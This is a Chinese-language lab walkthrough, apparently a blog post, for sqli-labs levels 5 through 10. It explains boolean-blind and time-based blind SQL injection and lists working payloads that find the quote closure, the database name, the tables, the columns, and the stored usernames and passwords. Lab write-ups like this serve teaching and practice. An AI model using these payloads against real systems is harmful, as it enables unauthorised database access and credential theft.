本文已参与「新人创作礼」活动,一起开启掘金创作之路。
前言:
咱们先补充一些知识点,布尔盲驻,注入的语句返回只会返回1和0,1就是对的,而0就是错的!
left()函数: left(database(),1)='s' left(a,b)从截取a的前b位,正确则返回1,错误则返回0 regexp函数: select user() regexp 'r' user()的结果是root,regexp为匹配root的正则表达式 like函数:select user() like 'ro%' 匹配与regexp相似 sbustr(a,b,c) select substr() xx xx substr(a,b,c)从位置b开始,截取a字符串c位长度 ascii() 将某个字符串转化为ascii的值
chr('数字') 或者是ord('字母') 使用python中的两个函数可以判断当前的ascii值是多少
对于security数据库:
注入时 注意加and
left((select database()),1)='s'--+ 前1位是否是s
(select database()) regexp 's'; 匹配第一个字符是否是s
(select database()) like 's%'; 匹配第一个字符是否是s
(select substr((select database()),1,1))='s'; 匹配第一个字符是否是s
(select substr ((select database()),1,3))='sec'; 匹配前三个字符是否是sec
(select ascii(substr((select database()),1,1))); 直接回显115 或者是 s
(select ascii(substr((select database()),1,1)))>110; 如果大于110,就会返回1,
否则返回0
sleep函数
时间延迟型手工注入,正确会延迟,错误没有延迟。
可以通过浏览器的刷新提示观察延迟情况,但是id正确的时候的回显有利于观察。
构造sql语句,带上时间延迟的函数,如果有明显的延迟说明有注入点。
第五关:
闭合符号的判断都没啥说的了,然后直接order by 判断列数, 咱们直接上干货!
?id=1’ and if(length(database())=8,sleep(5),1)--+
当你的数据库长度为8时,输出就会延迟5秒钟,如果不是8,则不会延迟
说明数据库的长度是8,然后下一步就是爆出数据库
?id=1' and left((select database()),1)='s'--+
?id=1' and left((select database()),2)='se'--+
.
.
.
?id=1' and left((select database()),8)='security'--+
然后下一步就是猜表名
?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users'--+
然后就是判断列名
?id=1' and left((select column_name from information_schema.columns where table_name= 'users' limit 4,1),8)='username'--+
limit 4,1是username,limit 3,1是id
limit 5,1是password
最后一步就是猜值
?id=1’ and left((select password from users order by id limit 0,1),4)=‘dumb’ --+
?id=1’ and left((select username from users order by id limit 0,1),4)=‘dumb’ --+
第六关:
与第五关一样,就是前面的单引号闭合转换成了双引号闭合,这里就不阐述了. 上面的注入都是经过靶场亲自实验成功才写下来的,希望对你们有所帮助
第七关:
第七关也是布尔盲驻,也是闭合符号不同,这里也再讲一下闭合符号的判断吧
先输入一个'
发现报错,然后输入注释符号--+,发现还报错,说明不止是',然后再输入),发现还是报错,说明还有东西,就再输入一个),发现就不再报错了,说明闭合符号就是'))
剩下的其实跟第五关一样
第八关:
第八关跟第五关可以说差不多真的是一模一样,先判断闭合符号,发现输入 ' 报错,再输入--+,就不再报错,说明 ' 就是闭合符号,剩下的输入跟第五关一模一样,就没啥说的了
第九关:
输入 ' " 发现都不报错,咱么就加一个sleep函数,
id=1' and sleep(5) --+
会发现,当输入的是id=1' 时,页面执行五秒后才刷新,而其他的注入都没这个效果,判断出闭合符号就是 ' 这里开始sleep函数的注入,left函数在这一题中判断不出来,无论对错,都是对的
?id=1' and if(length(database())=8,sleep(5),1)--+
页面延迟了五秒,数据库的长度就是8
猜数据库的名字
?id=1' and if(left(database(),1)='s',sleep(5),1)--+
'
'
?id=1' and if(left(database(),1)='security',sleep(5),8)--+
猜表的名字
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),5)--+
猜列的名字
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='username',sleep(5),1)--+
limit 5,1 是password 猜最后的值
?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+
?id=1’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+
第十关:
第十关就是在第九关的基础上,只是最前面的闭合符号从刚开始的 ' 变成了 " 其他的都不变!
加油!
